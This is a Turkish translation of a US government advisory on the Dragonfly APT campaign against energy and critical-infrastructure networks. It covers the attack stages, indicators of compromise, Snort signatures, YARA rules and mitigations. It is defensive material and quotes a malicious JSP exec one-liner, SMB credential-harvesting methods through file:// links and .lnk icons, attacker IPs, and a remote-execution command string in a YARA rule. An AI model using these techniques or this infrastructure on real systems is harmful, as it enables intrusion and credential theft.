Enerji ve Diğer Kritik Altyapı Sektörlerini Hedefleyen APT Tehlikesi

Etkilenen sistemler:

  • Domain Controller
  • Dosya sunucuları
  • Email sunucuları

Genel bakış:

Bu uyarı; enerji, nükleer, su, havacılık, kritik imalat yapılarını ve devlet birimlerini hedefleyen APT tehditi hakkında bilgi sağlar. Departmant of Homeland Security(DHS) bu aktiviteyi enerji sektörü içinde yüksek değerli varlık sahiplerinin ağlarına yanal olarak geçmek için düşük güvenlikli ve küçük ağları hedef alanlar tarafından çok aşamalı bir saldırı türü olarak değerlendiriyor. Zararlı yazılım analistleri ve gözlemlenen IOC’lere dayanan DHS bu saldırının halen devam etmekte olduğunu ve uzun vadede devam edeceğini öngörüyor.

Kullanılabilir dosyalar:
TA17-293A_TLP_WHITE_CSV.csv

TA17-293A%20_TLP_%20WHITE.xml

MIFR-10127623_TLP_WHITE.pdf

MIFR-10127623_TLP_WHITE_stix.xml

MIFR-10128327_TLP_WHITE.pdf

MIFR-10128327_TLP_WHITE_stix.xml

MIFR-10128336_TLP_WHITE.pdf

MIFR-10128336_TLP_WHITE_stix.xml

MIFR-10128830_TLP_WHITE.pdf

MIFR-10128830_TLP_WHITE_stix.xml

MIFR-10128883_TLP_WHITE.pdf

MIFR-10128883_TLP_WHITE_stix.xml

MIFR-10135300_TLP_WHITE.pdf

MIFR-10135300_TLP_WHITE_stix.xml

Açıklama:

Mayıs 2017’den bu yana saldırganlar devlet birimlerini, enerji, su, havacılık, nükleer ve kritik imalat sektörlerini hedef aldı. Tarihsel açıdan siber tehdit aktörleri siber casusluktan, düşmanca bir çatışma durumunda enerji sistemlerini bozma yeteneğine kadar çeşitli hedeflerle enerji sektörünü ve yine benzer sebeplerden diğer kritik altyapı sektörlerini de hedef almışlardır. DHS, FBI ve güvenilir ortaklar tarafından yapılan analizler bu aktiviteyle ilgili belirgin göstergeleri ve davranışları belirledi. Özellikle 6 Eylül 2017’de Symantec tarafından yayımlanan söz konusu tehdit grubunun hedefi olan batılı enerji sektörü Dragonfly raporu bu devam eden saldırı hakkında ek bilgi vermektedir. İlgili rapora buradan ulaşabilirsiniz.

Bu süreç iki ayrı mağdur kategorisini içermektedir: evreleme ve amaçlanan hedefler. İlk kurbanlar daha az güvenli ağlara sahip üçüncü parti tedarikçiler gibi çevresel organizasyonlardır. İlk kurbanlar bu uyarı boyunca aşamalı hedefler olarak adlandırılır. Tehdit aktörleri nihai amaçlanan kurbanları hedef alırken bu evreleme hedeflerinin ağlarını pivot noktası ve zararlı yazılım depoları olarak kullanır.

Teknik Detaylar:

Bu süreçteki tehdit aktörleri aşağıdakileri içeren çeşitli Taktik, Teknik ve Prosedür(TTP) istihdam eder:

  • Açık kaynak istihbarat
  • Oltalama epostaları
  • Watering-hole domains (Su kaynağı saldırısı)
  • Host tabanlı exploitation
  • Endüstriyel kontrol sistemleri
  • Süregiden kimlik bilgisi toplamak

Adım 1: Bilgi toplama

Tehdit aktörleri hedefledikleri kurumları kasıtlı olarak seçmiş görünüyorlar, tehdit aktörlerinin kurum tarafından izlenen ağlarda barındılan kamuya açık bilgilere aktif olarak erişmekte oldukları bilinmektedir. DHS, tehdit aktörlerinin organizasyonlar içindeki organizasyonel tasarımla ilgili bilgileri tanımlamayı ve sistemin yeteneklerini kontrol etmeyi amaçladığını değerlendiriyor. Adli analiz, tehdit aktörlerinin şirket kontrolündeki web sitelerine gönderilen bilgileri toplarken hedeflerine açık kaynak keşifleri gerçekleştirdiklerini tespit etti. Bu oltalama saldırısı için gerekli bilgileri toplamak üzere kullanılan ortak bir yöntemdir. Çoğu zararsız gibi görünen bilgiler aslında organizasyonel olarak hassas bilgiler içerebilir. Spesifik olarak tehdit aktörleri web siteleri, uzak email erişim portalları ve vpn bağlantıları gibi web tabanlı uzaktan erişim altyapısına eriştiler.

Adım 2: Spear-Phishing Email TTPs

Phishing süreci boyunca tehdit aktörleri SMB protokolünü kullanarak uzaktaki bir sunucudan belge almak için ve legal office işlevlerinden yararlanmak için e-posta eklerini kullandı. (dosya://<IpAdresi>/belge.dotm) Microsoft Word tarafından yürütülen standart işlemlerin bir parçası olarak bu istek istemciyi sunucu ile doğrulamakta ve istenen dosyayı almadan önce uzak sunucuya kullanıcının hash bilgisini gönderir. (Kimlik bilgilerinin aktarılması için kullanıcının dosya alması gerekli değildir.) Tehdit aktörleri daha sonra şifre kırma teknikleriyle hash’i kırarak düz metin halini elde ettiler.

Adım 3: Teslim

Tehdit aktörleri daha önce bildirilen TTP’lerden farklı bir phishing türü kullandı. Phishing e-postası sözleşme ve gizli başlıklı “”document.pdf” adında genel bir sözleşme teması içeriyordu.(Ekin adının başına iki tek kesme işaretinin eklendiğini unutmayın.) PDF’in kendisi zararlı kod içermemektedir, belge karşıdan yükleme otomatik başlamazsa kullanıcının bir bağlantıya tıklamasını ister, bağlantı kullanıcıları kısaltılmış bir URL yoluyla web sitesine yönlendirir ve burda zararlı kod içeren dosyayı indirmelerini sağlar. DHS ve FBI önceki raporda oltalama emaillerinde kullanılan tüm temaları email sistemlerinde buldu. Tehdit aktörleri özellikle hedeflenen organizasyonlara karşı bu temaları kullanmaya devam ediyor. Email mesajları ortak endüstriyel kontrol ekipmanları ve protokolleri için referanslar içerir. Epostalarda endüstriyel kontrol sistemleri personeli için özgeçmiş(CV) gibi görünen zararlı word eklerini kullanıcıya açması için gönderilen eklerin adı IOC’de yayınlandı.

Adım 4: Exploitation

Tehdit aktörleri perdeleme hedeflerine yönelik kimlik avı sürecinde farklı ve sıradışı TTP’ler kullandı. Birbirini izleyen yönlendirmeler diyebiliriz bunlara. Emaillerde kullanıcıyı http: // tinyurl [.] Com / h3sdqck bağlantısına yönlendiren ardından http: // bit [.] Ly / 2m0x8IH bağlantısına yönlendiren bir URL kısaltılması bağlantısı mevcuttu ve son olarak bu bağlantı kullanıcıyı yeniden http: // imageliners [.] com / nitel adresine yönlendirdi. Imageliner [.] com web sitesinde bir web sitesinin giriş sayfasını taklit eden bir email adresi ve şifre girişi alanları yer alıyordu.

İstenilen hedefler exploit edilirken tehdit aktörleri kullanıcı kimlik bilgilerini çalmak için zararlı kod içeren .docx dosyalarını kullandı ancak DHS, kullanıcının sistemlerinde kalıcılık kuran herhangi bir şey gözlemlemedi. Belgeler TCP 445 veya 139 ve UDP 137, 138 kullanarak SMB üzerinden “file:\\” bağlantısı aracılığıyla dosya almaya çalışır. Bu bağlantı tehdit aktörlerine ait bir komut ve denetime C2 sunucusudur. Bir kullanıcı alan adı kullanıcısı olarak doğrulandığında C2 sunucusu kurbanın hashini alacaktır. Yerel kullanıcılar bir kullanıcı adı ve parola girmek için grafik arayüz istemcisi alacaktır, bu bilgi TCP üzerinden 445 veya 139 numaralı bağlantı noktalarına veya 137, 138 numaralı UDP bağlantı noktalarına sağlanacaktır. (Symantec’in raporu, bu davranışı Dragonfly tehdit aktörleriyle ilişkilendirir.)

Su Kaynağı Saldırısı

Hedefleri belirlemek için tehdit aktörlerinin birincil kullanımlardan birisi su kaynağı saldırısıdır. Bu su kaynağı saldırısında domain adresleri tanınmış kuruluşlar tarafından meşru içeriğe ev sahipliği yapmasına rağmen tehdit aktörleri tarafından değiştirilmiştir. Tehdit aktörleri hedefe ulaşabilmek için güvenilen organizasyonların altyapısını kullanmıştır. Bilindik su kaynağı domainlerinin yaklaşık yarısı ICS veya kritik altyapı ile ilgili ticaret yayınları ve bilgi siteleridir. Benzer bir SMB toplama tekniği kullanarak aktörler, kimlik bilgisi toplamak için 445 bağlantı noktasındaki bir IP adresine yönlendiren JavaScript ve PHP dosyalarını değiştirerek bu web sitelerine yönlendirdiler, güvenlik açığı bulunan siteler hem özel olarak geliştirilen web uygulamaları hem de şablon tabanlı çerçeveler içeriyordu. Tehdit aktörleri yönlendirilen trafiği yürüten header.php dosyası içine bir dizi kod enjekte etti. Tehdit aktörlerinin siteleri manipüle etmek için zero-day exploit kullandığına dair bir işaret yoktu, büyük olasılıkla web sitelerinin içeriğine doğrudan erişmek için geçerli kimlik bilgilerini kullandılar.

Adım 5:  Yükleme

Tehdit aktörleri multi-factor authentication kullanmayan kurbanların ağlarını hedef aldı ve erişmek için onların kimlik bilgilerini kullandı. İstenilen hedef ağının içindeyken tehdit aktörleri uzaktaki bir sunucudan araçları indirdi. Dosya adlarının ilk sürümleri .txt uzantıları içeriyordu ve uygun uzantıyı genelde .exe veya .zip olarak tekrar adlandırdılar. Bu örnekte hedeflenen bir mağdurun ağına uzaktan eriştikten sonra tehdit aktörü aşağıdaki eylemleri gerçekleştirmiştir.

  • 91.183.104[.]150’ye bağlandı ve birden fazla dosya özellikle INST.txt dosyasını indirdi.
  • INST.txt dosyasının uzantısını değiştirip INST.exe yaptılar.
  • Dosyalar bulunduğu host üzerinde çalıştırılır ve ardından silinir.
  • INST.exe dosyasının çalıştırılmış olması ntdll.exe’nin karşıdan yüklenmesini tetikledi ve kısa süre sonra ntdll.exe hedefin sisteminde çalışan işlemler listesinde göründü.

Dragonfly hakkındaki rapolarında Symantec INST.exe’nin md5 hashini Backdoor.Goodor ile ilişkilendiriyor. Bu dosyalardan birkaçı tehdit aktörleri tarafından kullanılan ilk hesabı oluşturmak için kullanıldı. İlk betik symantec_help.jsp kötü niyetli bir komut dosyasına tek satırlı bir referans içeriyordu. Bu dosya C:\Program Files(x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\. adresinde bulunuyordu.

symantec_help.jsp içindekiler:
<% Runtime.getRuntime().exec(“cmd /C \”” + System.getProperty(“user.dir”) + “\\..\\webapps\\ROOT\\<REDACTED SCRIPT NAME>\””); %>

Zararlı komut dosyası bir kullanıcı hesabı oluşturuyordu, ana bilgisayar tabanlı güvenlik duvarını devre dışı bıraktı ve genel olarak uzak masaüstü protokolünü (3389) numaralı bağlantı noktasını açtı. Komut daha sonra yükseltilmiş ayrıcalıklara sahip olabilmek için yeni oluşturulan hesabı “Administrator” grubuna ekledi. Betik  “administrator” adlı grup adı için İspanyolca, İtalyanca, Almanca, Fransızca ve İngilizce’de sabit kodlanmış değerler içeriyordu.

Scheduled Task içeriği:

<?xml version=”1.0″ encoding=”UTF-16″?>
<Task version=”1.2″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
<Date>2017-06-25T11:51:17.4848488</Date>
<Author><REDACTED></Author>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<StartBoundary>2017-06-25T12:30:29</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Principals>
<Principal id=”Author”>
<RunLevel>LeastPrivilege</RunLevel>
<UserId><REDACTED USERNAME></UserId>
<LogonType>InteractiveToken</LogonType>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context=”Author”>
<Exec>
<Command>logoff</Command>
</Exec>
</Actions>
</Task>

Hedeflerine erişim sağladıktan sonra tehdit aktörleri amaçlarını ulaşmak için ücretsiz Forticlient VPN istemcisini kurdular.

Kimlik bilgileri toplamanın yanı sıra algılanan hedefle uyumlu olarak hydra, SecretsDump ve CrackMapExec gibi açık kaynak kodlu araçları indirip kullandığı gözlemlendi, adli analiz bu araçlarının çoğunun tehdit unsurunun sisteme eriştiği zaman içinde çalıştırıldığını gösteriyor. Tehdit aktörü Python 2.7’yi yükledi ve python betik dosyası C:\Users\<Redacted Username>\Desktop\OWAExchange\ dizininde görüldü. Önceki klasör yapısında “out” adlı bir alt klasör birden fazla metin dosyası bulunduruyordu.

.LNK Dosyası İle Kalıcılığı Sağlamak

Tehdit aktörleri .lnk dosyalarını defalarca kullanıcı kimlik bilgilerini toplamak için manipüle ettiler. Varsayılan Windows fonksiyonları simgelerin yerel bir Windows depodan yüklenmesini sağlar. Tehdit aktörleri, yerleşik bir Windows işlevselliğini uzaktan kontrollü sunucularına simge yolunu ayarlarak kullandılar. Kullanıcı dizine göz attığında Windows simgeyi yüklemeye ve bir SMB kimlik doğrulama oturumu başlatmaya çalışır. Bu işlem sırasında kullanıcının dönen kimlik bilgileri SMB bağlantısı üzerinden iletilir. Bunu hem sanal masaüstü yapısı (VDI) hem de geleneksel ortamlarda kullandılar.
Gözlemlenen .lnk dosyalarından üçü SETROUTE.lnk – notepad.exe.lnk ve document.lnk, bu isimler içeriksel olarak görünür ve tehdit aktörleri diğer dosya adlarını da kullanabilir. Bu .lnk dosyalarında gözlemlenen uzak sunuculardan ikisi 62.8.193[.]206 ve 5.153.58[.]45 ‘dir.

Yerel Hesap Oluşturmak

Tehdit aktörleri devam eden operasyonlar için hedef üzerinde kullanıcı hesapları yarattı. Bu hesaplar, legal hizmet hesapları takliti yaparak her bir sahneleme hedefine göre düzenlenmiş gibi görünüyordu. Tehdit aktörleri tarafından yaratılan her hesap işlemlerinde belirli bir amaca hizmet etti. DHS ve FBI tehlikeye atılmış bir sunucuda dört yerel hesap oluşturulduğunu tespit etti. Sunucu asıl hedef için hem bir etki alanı denetleyicisi hem de bir e-posta sunucusu olarak çalıştı.

Hesap 1: Ele geçirilen düşük güvenlikli ağların yedekleme servislerini taklit etmek için yerel bir hesap oluşturuldu. Tehdit aktörleri bu hesabı açık kaynaklı keşif yapıp bilgi toplamak için ve hedeflere uzaktan erişmek için kullandı. Bu hesap ayrıca Forticlient yazılımını kaldırmak için kullanılıyordu.

Hesap 2: Email yönetim hesabı kimliğine bürünmek için oluşturuldu. Gözlemlenen tek eylem 3 numaralı hesabı oluşturmasıydı.

Hesap 3: Kurbanın Microsoft Exchange sunucusunda oluşturuldu. Hesap 2 olarak kimlik doğrularken bir PowerShell komut dosyası bu hesabı RDP oturumu sırasında oluşturdu. Oluşturulan Microsoft Exchange hesabının adlandırma kuralları hazırlanan hedefin adlandırma kurallarını izledi.

Hesap 4: Hesap 4’ü oluşturmak için hesap 1’i kullandılar. Hesap 4 daha sonra aşağıdaki günlükleri silmek için kullanıldı: sistem, güvenlik, terminal hizmetleri, uzak servisler ve denetim, kayıt defteri, bu etkinliğin büyük ihtimalle komut dosyası olarak yazıldığı belirtildi.

Adım 6: Komuta & Kontrol

Tehdit aktörleri iç ağa sızmak için herkese ait sunucuları web shell kullanarak ele geçirirler. Bu etkinlik hem web hem de email sunucularında gözlemlenmiştir. Daha sonrasında tehdit aktörleri 443 numaralı bağlantı noktası üzerinden web kabuğuna şifrelenmiş bir bağlantı kurarlar. Bağlandıklarında tehdit aktörleri, kendi sunucularından kamuya açık sunuculara ek zararlı yazılım dosyalarını indirirler. AutoDiscover.aspx ve global.aspx ile birlikte verilen IOC listesinde detaylandırılmıştır. Farklı dosya adlarına sahip olmalarına rağmen iki web kabuğunun MD5 hashleri farklı isimli dosyaların aynı dosya olduğunu gösterir. Bu web kabukları ciklon_z webshell ile ilişkilendirilmiştir.

DHS ve FBI, RDP ve Outlook Web Access gibi uzaktan erişim hizmetlerinden ve altyapısından yararlanan tehdit aktörlerini tespit etti. Amaçlanan hedeflerin birçoğuna bağlanmak için perdelemeli hedefler kullandı. Böylece perdelemeli hedefleri komuta ve kontrol noktalarına etkili bir şekilde dönüştürdüler. Tehdit aktörlerinin bugüne kadar single-factor authentication kullanan servisleri hedef aldığı biliniyor.

Hedef Alınan ICS ve SCADA Altyapıları

Amaçlanan asıl hedeflere erişim sağlandıktan sonra tehdit aktörleri ağ içinde keşif operasyonları yürüttü. Spesifik olarak tehdit aktörleri hedef ağın dosya sunucularını belirlemek ve taramak üzerine yoğunlaştı. Tehdit oyuncuları ICS ve SCADA sistemlerine ilişkin dosyalar görüntülemişti. DHS analizine dayanarak bu dosyaların orjinali kuruluşla ilgili ICS satıcı adları ve ICS referans belgeleri (örn: SCADA WIRING DIAGRAM.pdf) içeren olarak adlandırılmıştır.

Bir kere de tehdit aktörleri enerji üretim tesisleri içindeki kontrol sistemlerinden çıkan verileri içeren kurumsal bir ağdaki iş istasyonlarına ve sunucularına eriştiler. Aynı olayda scr.exe’yi scr.jpg argümanlarıyla çağıran kötü niyetli zamanlanmış bir görev oluşturdu. Symantec Drafonfly 2.0 raporunda belirtildiği üzere scr.exe’nin MD5 karmaşık, tehdit aktörü tarafından kullanılan bir araç olan ScreenUtil’in MD5 ile eşleşti.

Tespit ve Müdahale

Bu süreçle ilgili IOC’ler bu uyarının eşlik eden .csv ve .stix dosyalarında sağlanmaktadır. DHS ve FBI ağ yöneticilerin IP adreslerini, etki alanı adlarını, dosya hashlerini, ağ imzalarını ve verilen YARA kurallarını gözden geçirmelerini ve kötü niyetli etkinliğin kuruluş içinde gözlenip gözlemlenmediğini belirlemek için IP’leri izleme listesine eklemelerini önerir. Sistem sahiplerinden ayrıca bu APT saldırganları tarafından hedef alındığından şüphelenilen herhangi bir sistemde YARA aracını çalıştırmaları önerilir.

Ağ İmzaları ve Host Tabanlı Kurallar

Bu ağ imzaları ve ana bilgisayar tabanlı kurallar kapsamında bir inceleme süreci kullanılarak oluşturulmuş olsa da, yanlış pozitif olasılık daima devam edecektir.
Network Signatures
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”HTTP URI contains ‘/aspnet_client/system_web/4_0_30319/update/’ (Beacon)”; sid:42000000; rev:1; flow:established,to_server; content:”/aspnet_client/system_web/4_0_30319/update/”; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)
___________________________________
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”HTTP URI contains ‘/img/bson021.dat'”; sid:42000001; rev:1; flow:established,to_server; content:”/img/bson021.dat”; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)
________________________________________
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”HTTP URI contains ‘/A56WY’ (Callback)”; sid:42000002; rev:1; flow:established,to_server; content:”/A56WY”; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)
_________________________________________
alert tcp any any -> any 445 (msg:”SMB Client Request contains ‘AME_ICON.PNG’ (SMB credential harvesting)”; sid:42000003; rev:1; flow:established,to_server; content:”|FF|SMB|75 00 00 00 00|”; offset:4; depth:9; content:”|08 00 01 00|”; distance:3; content:”|00 5c 5c|”; distance:2; within:3; content:”|5c|AME_ICON.PNG”; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)
________________________________________
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”HTTP URI OPTIONS contains ‘/ame_icon.png’ (SMB credential harvesting)”; sid:42000004; rev:1; flow:established,to_server; content:”/ame_icon.png”; http_uri; fast_pattern:only; content:”OPTIONS”; nocase; http_method; classtype:bad-unknown; metadata:service http;)
_________________________________________
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”HTTP Client Header contains ‘User-Agent|3a 20|Go-http-client/1.1′”; sid:42000005; rev:1; flow:established,to_server; content:”User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip”; http_header; fast_pattern:only; pcre:”/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U”; classtype:bad-unknown; metadata:service http;)
__________________________________________
alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:”SMB Server Traffic contains NTLM-Authenticated SMBv1 Session”; sid:42000006; rev:1; flow:established,to_client; content:”|ff 53 4d 42 72 00 00 00 00 80|”; fast_pattern:only; content:”|05 00|”; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)

YARA Rules

rule APT_malware_1
{
meta:
description = “inveigh pen testing tools & related artifacts”
author = “US-CERT Code Analysis Team”
date = “2017/07/17”
hash0 = “61C909D2F625223DB2FB858BBDF42A76”
hash1 = “A07AA521E7CAFB360294E56969EDA5D6”
hash2 = “BA756DD64C1147515BA2298B6A760260”
hash3 = “8943E71A8C73B5E343AA9D2E19002373”
hash4 = “04738CA02F59A5CD394998A99FCD9613”
hash5 = “038A97B4E2F37F34B255F0643E49FC9D”
hash6 = “65A1A73253F04354886F375B59550B46”
hash7 = “AA905A3508D9309A93AD5C0EC26EBC9B”
hash8 = “5DBEF7BDDAF50624E840CCBCE2816594”
hash9 = “722154A36F32BA10E98020A8AD758A7A”
hash10 = “4595DBE00A538DF127E0079294C87DA0”
strings:
$s0 = “file://”
$s1 = “/ame_icon.png”
$s2 = “184.154.150.66”
$s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }
$s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }
$s5 = “(g.charCodeAt(c)^l[(l[b]+l[e])%256])”
$s6 = “for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)”
$s7 = “VXNESWJfSjY3grKEkEkRuZeSvkE=”
$s8 = “NlZzSZk=”
$s9 = “WlJTb1q5kaxqZaRnser3sw==”
$s10 = “for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)”
$s11 = “fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])”
$s12 = “ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat”
$s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }
$s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }
$s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }
//inveigh pentesting tools
$s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }
//specific malicious word document PK archive
$s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }
$s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }
$s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }
$s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
$s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
$s22 = “5.153.58.45”
$s23 = “62.8.193.206”
$s24 = “/1/ree_stat/p”
$s25 = “/icon.png”
$s26 = “/pshare1/icon”
$s27 = “/notepad.png”
$s28 = “/pic.png”
$s29 = “http://bit.ly/2m0x8IH”
condition:
($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)
}
rule APT_malware_2
{
meta:
description = “rule detects malware”
author = “other”
strings:
$api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }
$http_push = “X-mode: push” nocase
$http_pop = “X-mode: pop” nocase
condition:
any of them
}
rule Query_XML_Code_MAL_DOC_PT_2
{
meta:
name= “Query_XML_Code_MAL_DOC_PT_2”
author = “other”
strings:
$zip_magic = { 50 4b 03 04 }
$dir1 = “word/_rels/settings.xml.rels”
$bytes = {8c 90 cd 4e eb 30 10 85 d7}
condition:
$zip_magic at 0 and $dir1 and $bytes
}
rule Query_Javascript_Decode_Function
{
meta:
name= “Query_Javascript_Decode_Function”
author = “other”
strings:
$decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}
$decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}
$decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}
$decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}
$func_call=”a(\””
condition:
filesize < 20KB and #func_call > 20 and all of ($decode*)
}
rule Query_XML_Code_MAL_DOC
{
meta:
name= “Query_XML_Code_MAL_DOC”
author = “other”
strings:
$zip_magic = { 50 4b 03 04 }
$dir = “word/_rels/” ascii
$dir2 = “word/theme/theme1.xml” ascii
$style = “word/styles.xml” ascii
condition:
$zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd
}

DHS ve FBI, ağ kullanıcılarını ve yöneticilerini, bu etkinliğe karşı savunmaya yardımcı olması için aşağıdaki tespit ve önleme yönergelerini kullanmalarını önerir.

Tespit ve Önleme Tedbirleri

  • Ağ saldırı tespit sistemi / ağ saldırı koruma sistemi logları
  • Web içerik logları
  • Proxy sunucusu logları
  • Domain adı ve server logları
  • Paket yakalama ve repoları
  • Firewall logları
  • Workstation tarayıcı geçmiş logları
  • HIPS logları
  • DLP logları
  • Exchange server logları
  • Kullanıcı mail kutuları
  • Mail filtreleme logları
  • Mail içerik logları
  • AV mail logları
  • OWA logları
  • Blackberry Enterprise Server logları ve Mobil cihaz yönetim logları.
  • Ekte bulunan dosya adları ve hashler içn workstation ve dosya sistemlerinin yanı sıra kullanıcı dizinlerini arayarak oltalama tespit edin.
  • Tüm .lnk dosyaları için kullanıcı profillerini içeren dosya paylaşımlarını arayarak VDI ortamlarında kalıcılığı tespit edin.
  • Silinen günlükleri tanımlayarak tehdit aktörleri tarafından kaçınma tekniklerini tespit edin. Bu son görülen girdileri gözden geçirerek ve Windows sistem günlüklerinde olay 104 aranarak yapılabilir.
  • Özellikle yakın zamanda oluşturulan yetkisiz hesapları tanımlamak için sistemdeki tüm yönetici hesalarını inceleyerek kalıcılığı tespit edin.
  • Tüm kullanıcılar için uzaktan erişilebilir sistemlerin erişim sürelerini gözden geçirerek legal kimlik bilgilerini kötü niyetli olarak tespit edin. Herhangi olağandışı giriş süreleri hesap sahipleri tarafından incelenmelidir.
  • Herhangi bir kullanıcının kimlik bilgilerinin tehlikeye atıldığından şüphelenilen tüm uzak masaüstü ve VPN oturumlarını doğrulayarak meşru kimlik bilgilerini kötüye kullanma şeklini algılayın
  • Ekte listelenen tüm ip adresleri için OWA günlüklerini arayarak spear-phishing tespit edin.
  • Mail sunucularında özellikle dışarıdan kullanıcı erişimi tüm yeni email hesaplarını doğrulayarak ağ üzerinden spear-phishing tespit edin.
  • Ekte listelenen tüm dosya adları için sistem günlüğünü arayarak sunuculardaki kalıcılığı tespit edin.
  • Ekte bulunan .ps1 ile biten tüm dosya adları için PowerShell günlüklerini arayarak yanal hareket ve yetki yükseltmesini tespit edin. (PowerShell sürüm 5 istemektedir ve PowerShell günlüğü etkinleştirilmelidir.)
  • Forticlient ve Python 2.7’yi dikkatle tespit edin ve yüklü olan tüm uygulamaları inceleyerek kalıcılığı tespit edin.
  • HKLM\SOFTWARE\Policies\Microsoft\Windows NT\TerminalServices\MaxInstanceCount konumunda REG_DWORD 100 değerini arayarak kalıcılığı arayın ve “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”. konumundaki REG_DWORD değeri 1 olanı arayın.
  • Alan adları olmadan URI’lerdeki indirmeler için proxy günlüklerini arayarak yüklemeleri algılayın.

Dış sunucularda web shell varlığını saptamak için ekte listelenen IP adreslerini, dosya adlarını ve dosya hashlerini aşağıdaki konumlarla karşılaştırın:

  • Application logları
  • IIS/Apache logları
  • Dosya sistemi
  • IDS / IPS logları
  • PCAP repoları
  • Firewall logları ve reverse proxy

Bu Süreçte Uygulanabilir En İyi Adımlar:

  • 139 ve 445 numaralı TCP bağlantı noktalarını, ilgili UDP bağlantı noktası 137 ile engelleyerek SMB ve ilgili protokollerin tüm sürümlerinin dış iletişimini ağ tabanlı engelleyin.
  • WebDAV protokolünü gateway üzerinde engelleyin.
  • VPN günlüklerinde anormal etkinlik (örn: saat dışı oturum açma, yetkisiz ip adresi, eş zamanlı oturum açma) için izleyin.
